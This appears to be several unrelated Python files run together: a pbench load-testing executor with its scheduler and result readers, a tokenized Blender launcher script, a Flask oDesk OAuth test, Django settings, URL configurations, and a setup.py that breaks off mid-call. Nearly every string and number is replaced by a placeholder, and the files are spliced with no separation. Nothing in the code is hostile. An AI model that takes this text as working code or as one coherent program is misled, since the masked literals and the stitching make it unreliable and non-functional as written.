    """Base wrapper around the pbench binary: builds its payload, schedule
    and config files and owns the spawned process.

    Subclasses implement _write_schedule_file / _get_source for the stock
    vs. Taurus-patched schedule formats.
    """
    SSL_STR = "<STR_LIT>"

    def __init__(self, executor, base_logger):
        """Capture executor context (engine, settings, execution params)."""
        super(PBenchTool, self).__init__()
        self.log = base_logger.getChild(self.__class__.__name__)
        self.executor = executor
        self.engine = executor.engine
        self.settings = executor.settings
        self.execution = executor.execution
        self.path = os.path.expanduser(self.settings.get('<STR_LIT:path>', '<STR_LIT>'))
        self.modules_path = os.path.expanduser(self.settings.get("<STR_LIT>", "<STR_LIT>"))
        self.kpi_file = None
        self.stats_file = None
        self.config_file = None
        self.payload_file = None
        self.schedule_file = None
        self.process = None
        self.use_ssl = False
        self.hostname = '<STR_LIT:localhost>'
        self.port = <NUM_LIT>
        # remembered scheme/netloc of the first request; all requests must match
        self._target = {"<STR_LIT>": None, "<STR_LIT>": None}

    def generate_config(self, scenario, load, hostaliases):
        """Render the pbench config file from the bundled template."""
        self.kpi_file = self.engine.create_artifact("<STR_LIT>", "<STR_LIT>")
        self.stats_file = self.engine.create_artifact("<STR_LIT>", "<STR_LIT>")
        self.config_file = self.engine.create_artifact('<STR_LIT>', '<STR_LIT>')
        conf_path = os.path.join(os.path.abspath(os.path.dirname(resources.__file__)), '<STR_LIT>')
        with open(conf_path) as _fhd:
            tpl = _fhd.read()
        instances = load.concurrency if load.concurrency else <NUM_LIT:1>
        timeout = int(dehumanize_time(scenario.get("<STR_LIT>", "<STR_LIT>")) * <NUM_LIT:1000>)
        # leave one core free by default; execution config can override
        threads = <NUM_LIT:1> if psutil.cpu_count() < <NUM_LIT:2> else (psutil.cpu_count() - <NUM_LIT:1>)
        threads = int(self.execution.get("<STR_LIT>", threads))
        if self.hostname in hostaliases:
            address = hostaliases[self.hostname]
        else:
            address = socket.gethostbyname(self.hostname)
        params = {
            "<STR_LIT>": self.modules_path,
            "<STR_LIT>": threads,
            "<STR_LIT>": self.engine.create_artifact("<STR_LIT>", "<STR_LIT>"),
            "<STR_LIT>": self.kpi_file,
            "<STR_LIT>": self.engine.create_artifact("<STR_LIT>", "<STR_LIT>"),
            "<STR_LIT>": self.execution.get("<STR_LIT>", "<STR_LIT>"),
            "<STR_LIT:source>": self._get_source(load),
            "<STR_LIT>": self.SSL_STR if self.use_ssl else "<STR_LIT>",
            "<STR_LIT>": "<STR_LIT>",
            "<STR_LIT:address>": address,
            "<STR_LIT:port>": self.port,
            "<STR_LIT>": timeout,
            "<STR_LIT>": instances,
            "<STR_LIT>": self.stats_file,
            "<STR_LIT>": self._get_additional_modules()
        }
        with open(self.config_file, '<STR_LIT:w>') as _fhd:
            substituter = string.Template(tpl)
            _fhd.write(substituter.substitute(params))

    def generate_payload(self, scenario):
        """Use the user-supplied payload script, or synthesize one."""
        script_path = scenario.get(Scenario.SCRIPT, None)
        if script_path is not None:
            self.payload_file = self.engine.find_file(script_path)
        else:
            self.payload_file = self.engine.create_artifact("<STR_LIT>", '<STR_LIT>')
            self.log.info("<STR_LIT>", self.payload_file)
            self._generate_payload_inner(scenario)

    @staticmethod
    def _estimate_max_progress_rps(load, payload_count):
        """Estimate total schedule items for throughput-driven (RPS) loads.

        Used only to size the progress bar, so approximation is acceptable.
        NOTE(review): float(load.iterations or "<STR_LIT>") — the masked
        string is presumably "inf"; verify against the original.
        """
        ramp_up = load.ramp_up if load.ramp_up else <NUM_LIT:0.0>
        iterations = float(load.iterations or "<STR_LIT>")
        iteration_limit_items = iterations * payload_count
        if load.iterations:
            whole_rampup_items = ramp_up * load.throughput / <NUM_LIT>
            rampup_items = min(iteration_limit_items, whole_rampup_items)
        else:
            rampup_items = ramp_up * load.throughput / <NUM_LIT>
        rampup_iterations = rampup_items / payload_count
        if load.hold and load.iterations:
            hold_iterations = load.iterations - rampup_iterations
            hold_iteration_limit = payload_count * hold_iterations
            whole_hold_items = load.hold * load.throughput
            hold_items = min(hold_iteration_limit, whole_hold_items)
        elif load.hold and not load.iterations:
            frac, _ = math.modf(rampup_iterations)
            hold_iterations = <NUM_LIT:2> - frac
            hold_iterations_items = payload_count * hold_iterations
            hold_duration_items = load.hold * load.throughput
            hold_items = min(hold_iterations_items, hold_duration_items)
        else:
            hold_items = <NUM_LIT:0.0>
        return rampup_items + hold_items

    @staticmethod
    def _estimate_max_progress_concurrency(load, payload_count):
        """Estimate total schedule items for concurrency-driven loads."""
        ramp_up = load.ramp_up if load.ramp_up else <NUM_LIT:0.0>
        if load.iterations:
            return load.iterations * payload_count
        else:
            if ramp_up:
                instances = float(load.concurrency) if load.concurrency else <NUM_LIT:1.0>
                concurrency_iterations = instances / payload_count
                upper_iteration_limit = int(concurrency_iterations) + <NUM_LIT:2>
            elif load.hold:
                upper_iteration_limit = <NUM_LIT:2>
            else:
                upper_iteration_limit = <NUM_LIT:1>
            return upper_iteration_limit * payload_count

    def _estimate_max_progress(self, load, payload_count):
        # dispatch on load type: RPS-shaped vs concurrency-shaped
        if load.throughput:
            return self._estimate_max_progress_rps(load, payload_count)
        else:
            return self._estimate_max_progress_concurrency(load, payload_count)

    @abstractmethod
    def _write_schedule_file(self, load, scheduler, sfd):
        """Write schedule entries to file object `sfd` (format per subclass)."""
        pass

    def generate_schedule(self, load):
        """Create the schedule file unless one is given in execution config."""
        self.schedule_file = self.execution.get("<STR_LIT>", None)
        if self.schedule_file is None:
            self.schedule_file = self.engine.create_artifact("<STR_LIT>", '<STR_LIT>')
            self.log.info("<STR_LIT>", self.schedule_file)
            with open(self.payload_file, '<STR_LIT:rb>') as pfd:
                scheduler = Scheduler(load, pfd, self.log)
                with open(self.schedule_file, '<STR_LIT:wb>') as sfd:
                    self._write_schedule_file(load, scheduler, sfd)
            self.log.info("<STR_LIT>")

    def check_config(self):
        """Dry-run the tool against the generated config; raise on failure."""
        cmdline = [self.path, '<STR_LIT>', self.config_file]
        self.log.debug("<STR_LIT>", cmdline)
        try:
            subprocess.check_call(cmdline, stdout=subprocess.PIPE)
        except CalledProcessError:
            self.log.error("<STR_LIT>", traceback.format_exc())
            raise

    def start(self, config_file):
        """Spawn the pbench process; keep console output unless captured."""
        cmdline = [self.path, '<STR_LIT>', config_file]
        # when stdout/stderr are StringIO (tests), let the child inherit nothing
        stdout = sys.stdout if not isinstance(sys.stdout, StringIO) else None
        stderr = sys.stderr if not isinstance(sys.stderr, StringIO) else None
        try:
            self.process = self.executor.execute(cmdline,
                                                 stdout=stdout,
                                                 stderr=stderr)
        except OSError as exc:
            self.log.error("<STR_LIT>", traceback.format_exc())
            self.log.error("<STR_LIT>", cmdline)
            raise RuntimeError("<STR_LIT>" % exc)

    def _generate_payload_inner(self, scenario):
        """Serialize every scenario request into the payload file."""
        requests = scenario.get_requests()
        num_requests = <NUM_LIT:0>
        with open(self.payload_file, '<STR_LIT:w>') as fds:
            for request in requests:
                http = self._build_request(request, scenario)
                fds.write("<STR_LIT>" % (len(http), request.label.replace('<STR_LIT:U+0020>', '<STR_LIT:_>'), http))
                num_requests += <NUM_LIT:1>
        if not num_requests:
            raise ValueError("<STR_LIT>")

    def _build_request(self, request, scenario):
        """Render one request as a raw HTTP/1.x message string."""
        path = self._get_request_path(request, scenario)
        http = "<STR_LIT>" % (request.method, path)
        headers = BetterDict()
        headers.merge({"<STR_LIT>": self.hostname})
        if not scenario.get("<STR_LIT>", True):
            headers.merge({"<STR_LIT>": '<STR_LIT>'})
        body = "<STR_LIT>"
        if isinstance(request.body, dict):
            # dict bodies are form-encoded, except for GET (become query string)
            if request.method != "<STR_LIT:GET>":
                body = urlencode(request.body)
        elif isinstance(request.body, string_types):
            body = request.body
        elif request.body:
            raise ValueError("<STR_LIT>" % (type(request.body), request.body))
        if body:
            headers.merge({"<STR_LIT>": len(body)})
        # precedence: computed < scenario-level < per-request headers
        headers.merge(scenario.get("<STR_LIT>"))
        headers.merge(request.headers)
        for header, value in iteritems(headers):
            http += "<STR_LIT>" % (header, value)
        http += "<STR_LIT>" % (body,)
        return http

    def _get_request_path(self, request, scenario):
        """Return the path+query for a request; lock scheme/netloc to the
        first request seen and derive hostname/port/ssl from it."""
        parsed_url = parse.urlparse(request.url)
        if not self._target.get("<STR_LIT>"):
            self._target["<STR_LIT>"] = parsed_url.scheme
        if not self._target.get("<STR_LIT>"):
            self._target["<STR_LIT>"] = parsed_url.netloc
        # pbench talks to one host: reject requests targeting another
        if parsed_url.scheme != self._target["<STR_LIT>"] or parsed_url.netloc != self._target["<STR_LIT>"]:
            raise ValueError("<STR_LIT>")
        path = parsed_url.path
        if parsed_url.query:
            path += "<STR_LIT:?>" + parsed_url.query
        else:
            if request.method == "<STR_LIT:GET>" and isinstance(request.body, dict):
                path += "<STR_LIT:?>" + urlencode(request.body)
        if not parsed_url.netloc:
            # relative URL: fall back to the scenario default address
            parsed_url = parse.urlparse(scenario.get("<STR_LIT>", "<STR_LIT>"))
        self.hostname = parsed_url.netloc.split('<STR_LIT::>')[<NUM_LIT:0>] if '<STR_LIT::>' in parsed_url.netloc else parsed_url.netloc
        self.use_ssl = parsed_url.scheme == '<STR_LIT>'
        if parsed_url.port:
            self.port = parsed_url.port
        else:
            self.port = <NUM_LIT> if self.use_ssl else <NUM_LIT>
        return path if len(path) else '<STR_LIT:/>'

    @abstractmethod
    def _get_source(self, load):
        """Return the config-template 'source' clause (format per subclass)."""
        pass

    def get_results_reader(self):
        return PBenchKPIReader(self.kpi_file, self.log, self.stats_file)

    def _get_additional_modules(self):
        # base tool loads no extra modules; Taurus variant appends its own
        return "<STR_LIT>"


class OriginalPBenchTool(PBenchTool):
    """Schedule writer for the stock pbench: plain-text schedule lines."""
    NL = "<STR_LIT:\n>"

    def _write_schedule_file(self, load, scheduler, sfd):
        cnt = <NUM_LIT:0>
        payload_entry_count = None
        pbar = None
        start_time = time.time()
        for item in scheduler.generate():
            time_offset, payload_len, payload_offset, payload, marker, record_type, overall_len = item
            # once the first full payload pass is done we know its size and
            # can set up a progress bar for the remaining generation
            if scheduler.iterations > <NUM_LIT:1> and payload_entry_count is None:
                payload_entry_count = scheduler.count
                estimated_size = self._estimate_max_progress(load, payload_entry_count)
                self.log.debug("<STR_LIT>", estimated_size)
                if estimated_size:
                    pbar = IncrementableProgressBar(maxval=estimated_size)
                    pbar.catchup(start_time, cnt)
            # negative offset means "as fast as possible" — clamp to zero here
            if time_offset < <NUM_LIT:0>:
                time_offset = <NUM_LIT:0.0>
            sfd.write(b("<STR_LIT>" % (payload_len, int(<NUM_LIT:1000> * time_offset), marker, self.NL)))
            sfd.write(b("<STR_LIT>" % (payload, self.NL)))
            cnt += <NUM_LIT:1>
            if pbar:
                pbar.increment()
        self.log.debug("<STR_LIT>", cnt)
        if pbar:
            pbar.finish()

    def _get_source(self, load):
        return '<STR_LIT>' % self.schedule_file


class TaurusPBenchTool(PBenchTool):
    """Schedule writer for the Taurus-patched pbench: compact binary records
    of (delay, record type, payload length, payload offset)."""

    def _write_schedule_file(self, load, scheduler, sfd):
        prev_offset = <NUM_LIT:0>
        accum_interval = <NUM_LIT:0.0>  # carries sub-millisecond remainders forward
        cnt = <NUM_LIT:0>
        payload_entry_count = None
        pbar = None
        start_time = time.time()
        for item in scheduler.generate():
            time_offset, payload_len, payload_offset, payload, marker, record_type, overall_len = item
            if scheduler.iterations > <NUM_LIT:1> and payload_entry_count is None:
                payload_entry_count = scheduler.count
                estimated_size = self._estimate_max_progress(load, payload_entry_count)
                self.log.debug("<STR_LIT>", estimated_size)
                if estimated_size:
                    pbar = IncrementableProgressBar(maxval=estimated_size)
                    pbar.catchup(start_time, cnt)
            if time_offset >= <NUM_LIT:0>:
                # accumulate fractional milliseconds so rounding never drifts
                accum_interval += <NUM_LIT:1000> * (time_offset - prev_offset)
                interval = int(math.floor(accum_interval))
                accum_interval -= interval
            else:
                interval = <NUM_LIT>
            # pack interval into 3 bytes + 1 byte record type
            type_and_delay = struct.pack("<STR_LIT:I>", interval)[:-<NUM_LIT:1>] + b(chr(record_type))
            payload_len_bytes = struct.pack('<STR_LIT:I>', overall_len)
            payload_offset_bytes = struct.pack('<STR_LIT>', payload_offset)
            sfd.write(type_and_delay + payload_len_bytes + payload_offset_bytes)
            if pbar:
                pbar.increment()
            cnt += <NUM_LIT:1>
            prev_offset = time_offset
        self.log.debug("<STR_LIT>", cnt)
        if pbar:
            pbar.finish()

    def _get_source(self, load):
        tpl = '<STR_LIT>'
        if load.duration:
            duration_limit = "<STR_LIT>" % int(load.duration)
        else:
            duration_limit = "<STR_LIT>"
        return tpl % (self.payload_file, self.schedule_file, duration_limit)

    def _get_additional_modules(self):
        # extend base modules with the Taurus-specific pbench plugin
        res = super(TaurusPBenchTool, self)._get_additional_modules()
        res += '<STR_LIT>' % self.modules_path
        return res


class Scheduler(object):
    """Generates (time offset, payload) schedule items by cycling over the
    payload file according to the load profile (ramp-up, steps, hold)."""

    # record types emitted alongside each schedule entry
    REC_TYPE_SCHEDULE = <NUM_LIT:0>
    REC_TYPE_LOOP_START = <NUM_LIT:1>
    REC_TYPE_STOP = <NUM_LIT:2>

    def __init__(self, load, payload_fhd, logger):
        super(Scheduler, self).__init__()
        # None = undecided; True = loop marker pending; False = already emitted
        self.need_start_loop = None
        self.log = logger
        self.load = load
        self.payload_fhd = payload_fhd
        if not load.duration and not load.iterations:
            self.iteration_limit = <NUM_LIT:1>
        else:
            self.iteration_limit = load.iterations
        self.concurrency = load.concurrency if load.concurrency is not None else <NUM_LIT:1>
        self.step_len = load.ramp_up / load.steps if load.steps and load.ramp_up else <NUM_LIT:0>
        if load.throughput:
            self.ramp_up_slope = load.throughput / load.ramp_up if load.ramp_up else <NUM_LIT:0>
            self.step_size = float(load.throughput) / load.steps if load.steps else <NUM_LIT:0>
        else:
            self.ramp_up_slope = None
            self.step_size = float(self.concurrency) / load.steps if load.steps else <NUM_LIT:0>
        self.count = <NUM_LIT:0.0>
        self.time_offset = <NUM_LIT:0.0>
        self.iterations = <NUM_LIT:0>

    def _payload_reader(self):
        """Yield payload entries, rewinding the file to loop iterations."""
        self.iterations = <NUM_LIT:1>
        rec_type = self.REC_TYPE_SCHEDULE
        while True:
            payload_offset = self.payload_fhd.tell()
            line = self.payload_fhd.readline()
            if not line:  # EOF: either rewind for another pass or stop
                self.payload_fhd.seek(<NUM_LIT:0>)
                self.iterations += <NUM_LIT:1>
                if self.need_start_loop is not None and self.need_start_loop and not self.iteration_limit:
                    # first wrap after ramp-up completes: mark the loop start
                    self.need_start_loop = False
                    self.iteration_limit = self.iterations
                    rec_type = self.REC_TYPE_LOOP_START
                if self.iteration_limit and self.iterations > self.iteration_limit:
                    self.log.debug("<STR_LIT>", self.iteration_limit)
                    break
                continue
            if not line.strip():
                continue
            # each meta line: "<payload_len> <marker>", then the payload bytes
            parts = line.split(b('<STR_LIT:U+0020>'))
            if len(parts) < <NUM_LIT:2>:
                # NOTE(review): RuntimeError with two args (not %-formatted),
                # kept as in the original
                raise RuntimeError("<STR_LIT>", line)
            payload_len, marker = parts
            marker = marker.decode()
            payload_len = int(payload_len)
            payload = self.payload_fhd.read(payload_len).decode()
            yield payload_len, payload_offset, payload, marker.strip(), len(line), rec_type
            rec_type = self.REC_TYPE_SCHEDULE

    def generate(self):
        """Yield full schedule items with computed time offsets."""
        for payload_len, payload_offset, payload, marker, meta_len, record_type in self._payload_reader():
            if self.load.throughput:
                # RPS mode: offsets accumulate from inter-request intervals
                self.time_offset += self.__get_time_offset_rps()
                if self.time_offset > self.load.duration:
                    self.log.debug("<STR_LIT>", self.time_offset)
                    break
            else:
                # concurrency mode: offset computed per instance directly
                self.time_offset = self.__get_time_offset_concurrency()
            overall_len = payload_len + meta_len
            yield self.time_offset, payload_len, payload_offset, payload, marker, record_type, overall_len
            self.count += <NUM_LIT:1>

    def __get_time_offset_concurrency(self):
        if not self.load.ramp_up or self.count >= self.concurrency:
            # all instances started: -1 means "no delay, loop freely"
            if self.need_start_loop is None:
                self.need_start_loop = True
            return -<NUM_LIT:1>
        elif self.load.steps:
            step = math.floor(self.count / self.step_size)
            return step * self.step_len
        else:
            # linear ramp-up of instance starts
            return self.count * self.load.ramp_up / self.concurrency

    def __get_time_offset_rps(self):
        if not self.load.ramp_up or self.time_offset > self.load.ramp_up:
            # past ramp-up: hold at target throughput
            rps = self.load.throughput
            if self.need_start_loop is None:
                self.need_start_loop = True
        elif self.load.steps:
            rps = self.step_size * (math.floor(self.time_offset / self.step_len) + <NUM_LIT:1>)
        else:
            # linear ramp: invert cumulative request count to current rate
            xpos = math.sqrt(<NUM_LIT:2> * self.count / self.ramp_up_slope)
            rps = xpos * self.ramp_up_slope
        return <NUM_LIT:1.0> / rps if rps else <NUM_LIT:0>


class PBenchKPIReader(ResultsReader):
    """Incremental reader of the pbench KPI (tab-separated) result file,
    optionally enriched with concurrency data from the stats file."""

    def __init__(self, filename, parent_logger, stats_filename):
        super(PBenchKPIReader, self).__init__()
        self.log = parent_logger.getChild(self.__class__.__name__)
        self.filename = filename
        self.csvreader = None
        self.offset = <NUM_LIT:0>  # resume position between _read() calls
        self.fds = None
        if stats_filename:
            self.stats_reader = PBenchStatsReader(stats_filename, parent_logger)
        else:
            self.stats_reader = None

    def _read(self, last_pass=False):
        """Yield KPI tuples for rows appended since the previous call."""
        def mcs2sec(val):
            # microseconds -> seconds (masked divisors, presumably 1000/1000.0)
            return int(int(val) / <NUM_LIT>) / <NUM_LIT>

        if self.stats_reader:
            self.stats_reader.read_file(last_pass)
        if not self.csvreader and not self.__open_fds():
            self.log.debug("<STR_LIT>")
            return
        self.log.debug("<STR_LIT>", self.filename)
        self.fds.seek(self.offset)
        for row in self.csvreader:
            label = row["<STR_LIT:label>"]
            rtm = mcs2sec(row["<STR_LIT>"])
            ltc = mcs2sec(row["<STR_LIT>"])
            cnn = mcs2sec(row["<STR_LIT>"])
            if row["<STR_LIT>"] != "<STR_LIT:0>":
                # non-zero errno: report the OS error string as the result code
                error = strerror(int(row["<STR_LIT>"]))
                rcd = error
            else:
                error = None
                rcd = row["<STR_LIT>"]
            tstmp = int(float(row["<STR_LIT>"]) + rtm)
            concur = <NUM_LIT:0>  # filled in later by _calculate_datapoints
            yield tstmp, label, concur, rtm, cnn, ltc, rcd, error, '<STR_LIT>'
        self.offset = self.fds.tell()

    def _calculate_datapoints(self, final_pass=False):
        # overlay measured concurrency from the stats file onto each datapoint
        for point in super(PBenchKPIReader, self)._calculate_datapoints(final_pass):
            if self.stats_reader:
                concurrency = self.stats_reader.get_data(point[DataPoint.TIMESTAMP])
            else:
                concurrency = <NUM_LIT:0>
            for label_data in viewvalues(point[DataPoint.CURRENT]):
                label_data[KPISet.CONCURRENCY] = concurrency
            yield point

    def __open_fds(self):
        """Open the KPI file once it exists and is non-empty; return success."""
        if not os.path.isfile(self.filename):
            self.log.debug("<STR_LIT>", self.filename)
            return False
        fsize = os.path.getsize(self.filename)
        if not fsize:
            self.log.debug("<STR_LIT>", self.filename)
            return False
        self.log.debug("<STR_LIT>", self.filename)
        self.fds = open(self.filename)
        fields = ("<STR_LIT>", "<STR_LIT:label>", "<STR_LIT>",
                  "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
                  "<STR_LIT>",
                  "<STR_LIT>", "<STR_LIT>",
                  "<STR_LIT>", "<STR_LIT>")
        dialect = csv.excel_tab()
        self.csvreader = csv.DictReader(self.fds, fields, dialect=dialect)
        return True

    def __del__(self):
        # best-effort cleanup; __del__ ordering is not guaranteed
        if self.fds:
            self.fds.close()


class PBenchStatsReader(object):
    """Parses the pbench stats stream (concatenated JSON chunks split by
    MARKER) into a {unix_timestamp: active_connections} map."""
    MARKER = "<STR_LIT>"

    def __init__(self, filename, parent_logger):
        super(PBenchStatsReader, self).__init__()
        self.log = parent_logger.getChild(self.__class__.__name__)
        self.filename = filename
        self.buffer = '<STR_LIT>'
        self.fds = None
        self.data = {}

    def read_file(self, last_pass=False):
        """Consume any new stats data and fold it into self.data."""
        if not os.path.isfile(self.filename):
            self.log.debug("<STR_LIT>", self.filename)
            return False
        if not self.fds:
            self.log.debug("<STR_LIT>", self.filename)
            self.fds = open(self.filename)
        self.buffer += self.fds.read()
        while self.MARKER in self.buffer:
            idx = self.buffer.find(self.MARKER) + len(self.MARKER)
            chunk_str = self.buffer[:idx - <NUM_LIT:1>]
            # NOTE(review): `idx + +<NUM_LIT:1>` — the second `+` is a unary
            # plus (no-op); kept byte-identical to the original.
            self.buffer = self.buffer[idx + +<NUM_LIT:1>:]
            chunk = json.loads("<STR_LIT>" % chunk_str)
            for date_str in chunk.keys():
                statistics = chunk[date_str]
                date_obj = datetime.datetime.strptime(date_str.split("<STR_LIT:.>")[<NUM_LIT:0>], '<STR_LIT>')
                date = int(time.mktime(date_obj.timetuple()))
                self.data[date] = <NUM_LIT:0>
                for benchmark_name in statistics.keys():
                    if not benchmark_name.startswith("<STR_LIT>"):
                        continue
                    benchmark = statistics[benchmark_name]
                    for method in benchmark:
                        meth_obj = benchmark[method]
                        if "<STR_LIT>" in meth_obj:
                            # index 2 of the masked stat array — presumably
                            # the active-connections figure; verify upstream
                            self.data[date] += meth_obj["<STR_LIT>"][<NUM_LIT:2>]
                self.log.debug("<STR_LIT>", date, self.data[date])

    def get_data(self, tstmp):
        """Return the recorded value for `tstmp`, or 0 when absent."""
        if tstmp in self.data:
            return self.data[tstmp]
        else:
            self.log.debug("<STR_LIT>", tstmp)
            return <NUM_LIT:0>

    def __del__(self):
        if self.fds:
            self.fds.close()


class PBench(RequiredTool):
    """RequiredTool wrapper: detects the pbench binary; install is manual."""

    def __init__(self, parent_logger, tool_path):
        super(PBench, self).__init__("<STR_LIT>", tool_path)
        self.log = parent_logger.getChild(self.__class__.__name__)

    def check_if_installed(self):
        # running the binary with no args is enough to prove it exists
        self.log.debug("<STR_LIT>", self.tool_path)
        try:
            pbench = shell_exec([self.tool_path], stderr=subprocess.STDOUT)
            pbench_out, pbench_err = pbench.communicate()
            self.log.debug("<STR_LIT>", pbench_out)
            if pbench_err:
                self.log.warning("<STR_LIT>", pbench_err)
            return True
        except (CalledProcessError, OSError):
            self.log.debug("<STR_LIT>", traceback.format_exc())
            self.log.error("<STR_LIT>")
            return False

    def install(self):
        # no automated installer exists for this tool
        raise RuntimeError("<STR_LIT>")
<s> import sys <EOL> import os <EOL> import subprocess <EOL> def callBlender ( filename ) : <EOL> blenderFilename = "<STR_LIT>" <EOL> blendFilename = os . path . join ( os . path . dirname ( os . path . realpath ( __file__ ) ) , "<STR_LIT>" ) <EOL> command = [ blenderFilename , "<STR_LIT>" , blendFilename , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , filename ] <EOL> proc = subprocess . Popen ( command ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> for n in sys . argv [ <NUM_LIT:1> : ] : <EOL> callBlender ( n ) <EOL> raw_input ( ) </s>
from flask import Flask, url_for
from flaskext.odesk import odesk
from mock import patch
import unittest


class ODeskTestCase(unittest.TestCase):
    """Tests for the Flask oDesk extension (URL routing and OAuth login flow)."""

    def setUp(self):
        # Build a throwaway Flask app, register the odesk module on it, and
        # push a request context so url_for() works inside the tests.
        app = Flask(__name__)
        app.config['<STR_LIT>'] = '<STR_LIT>'
        app.config['<STR_LIT>'] = '<STR_LIT>'
        app.config['<STR_LIT>'] = '<STR_LIT>'
        app.register_module(odesk, url_prefix='<STR_LIT>')
        ctx = app.test_request_context()
        ctx.push()
        self.app = app
        self.tc = self.app.test_client()

    def test_url_for(self):
        # The extension's endpoints must resolve to the expected paths.
        assert url_for('<STR_LIT>') == '<STR_LIT>'
        assert url_for('<STR_LIT>') == '<STR_LIT>'
        assert url_for('<STR_LIT>') == '<STR_LIT>'

    def test_login_required(self):
        # Fake the httplib2 round-trips so the OAuth dance succeeds without
        # any network traffic.
        def patched_httplib2_request(*args, **kwargs):
            return {'<STR_LIT:status>': '<STR_LIT>'}, '<STR_LIT>'

        def patched_httplib2_access(*args, **kwargs):
            return {'<STR_LIT:status>': '<STR_LIT>'}, '<STR_LIT>'

        def patched_get_authorize_url(*args, **kwargs):
            # Redirect straight back to the callback with a canned verifier.
            return url_for('<STR_LIT>', next='<STR_LIT>', oauth_verifier='<STR_LIT>')

        # NOTE(review): decorator order matters here — the route is outermost
        # so the patches are live for the whole request.
        @self.app.route('<STR_LIT>')
        @patch('<STR_LIT>', patched_httplib2_request)
        @patch('<STR_LIT>', patched_get_authorize_url)
        @patch('<STR_LIT>', patched_httplib2_access)
        @odesk.login_required
        def admin():
            # Capture authorization state on self so the assertions below can
            # inspect what happened inside the request.
            self.odesk_is_authorized = odesk.is_authorized()
            self.odesk_access_token = odesk.get_access_token()
            odesk.logout()
            self.odesk_is_not_authorized = odesk.is_authorized()
            return "<STR_LIT>"

        response = self.tc.get('<STR_LIT>', follow_redirects=True)
        assert "<STR_LIT>" in response.data
        assert self.odesk_is_authorized == True
        assert self.odesk_access_token == ('<STR_LIT>', '<STR_LIT>')
        # After logout() the session must no longer be authorized.
        assert self.odesk_is_not_authorized == False


if __name__ == '<STR_LIT:__main__>':
    unittest.main()
# Django settings module for the two-factor test/demo project.
import os
from django.core.urlresolvers import reverse_lazy
# The YubiKey integration is optional; enable its app only when installed.
try:
    import otp_yubikey
except ImportError:
    otp_yubikey = None

BASE_DIR = os.path.dirname(__file__)
SECRET_KEY = '<STR_LIT>'

INSTALLED_APPS = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]
if otp_yubikey:
    INSTALLED_APPS += ['<STR_LIT>']

MIDDLEWARE_CLASSES = (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
)

ROOT_URLCONF = '<STR_LIT>'

# Auth redirects are resolved lazily because URLconfs are not loaded yet
# at settings-import time.
LOGOUT_URL = reverse_lazy('<STR_LIT>')
LOGIN_URL = reverse_lazy('<STR_LIT>')
LOGIN_REDIRECT_URL = reverse_lazy('<STR_LIT>')

CACHES = {
    '<STR_LIT:default>': {
        '<STR_LIT>': '<STR_LIT>',
    }
}

DATABASES = {
    '<STR_LIT:default>': {
        '<STR_LIT>': '<STR_LIT>',
    }
}

# Legacy (pre-1.8) template setting kept alongside the TEMPLATES dict.
TEMPLATE_DIRS = (
    os.path.join(BASE_DIR, '<STR_LIT>'),
)
TEMPLATES = [
    {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': [
            os.path.join(BASE_DIR, '<STR_LIT>'),
        ],
        '<STR_LIT>': True,
        '<STR_LIT>': {
            '<STR_LIT>': [
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
            ],
        },
    },
]

TWO_FACTOR_PATCH_ADMIN = False
# Allow the test matrix to swap in a custom user model via the environment.
AUTH_USER_MODEL = os.environ.get('<STR_LIT>', '<STR_LIT>')
# URLconf for the two_factor app.
from django.conf.urls import url
from two_factor.views import (LoginView,
                              PhoneDeleteView, PhoneSetupView, DisableView,
                              BackupTokensView, SetupCompleteView, SetupView,
                              ProfileView, QRGeneratorView)

# Core two-factor workflow: login, device setup, QR code, backup tokens,
# and phone management.
core = [
    url(
        regex=r'<STR_LIT>',
        view=LoginView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=SetupView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=QRGeneratorView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=SetupCompleteView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=BackupTokensView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=PhoneSetupView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=PhoneDeleteView.as_view(),
        name='<STR_LIT>',
    ),
]

# Profile pages: overview plus disabling two-factor authentication.
profile = [
    url(
        regex=r'<STR_LIT>',
        view=ProfileView.as_view(),
        name='<STR_LIT>',
    ),
    url(
        regex=r'<STR_LIT>',
        view=DisableView.as_view(),
        name='<STR_LIT>',
    ),
]

urlpatterns = core + profile
# URLconf for session management: listing sessions, deleting all other
# sessions, and deleting a single session.
from django.conf.urls import url
from user_sessions.views import SessionDeleteOtherView
from .views import SessionListView, SessionDeleteView

urlpatterns = [
    url(r'<STR_LIT>', SessionListView.as_view(), name='<STR_LIT>'),
    url(r'<STR_LIT>', SessionDeleteOtherView.as_view(), name='<STR_LIT>'),
    url(r'<STR_LIT>', SessionDeleteView.as_view(), name='<STR_LIT>'),
]
from setuptools import setup

DESCRIPTION = "<STR_LIT>"

# Read the long description from the README when available; fall back to
# None (e.g. when installing from a distribution that lacks the file).
LONG_DESCRIPTION = None
try:
    # Context manager closes the file handle; the old code leaked it.
    with open('<STR_LIT>') as readme:
        LONG_DESCRIPTION = readme.read()
except IOError:
    # Narrowed from a bare `except:` which also swallowed SystemExit and
    # KeyboardInterrupt; a missing/unreadable README is the only case we
    # intend to tolerate here.
    pass

CLASSIFIERS = [
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
]

setup(
    name='<STR_LIT>',
    version='<STR_LIT>',
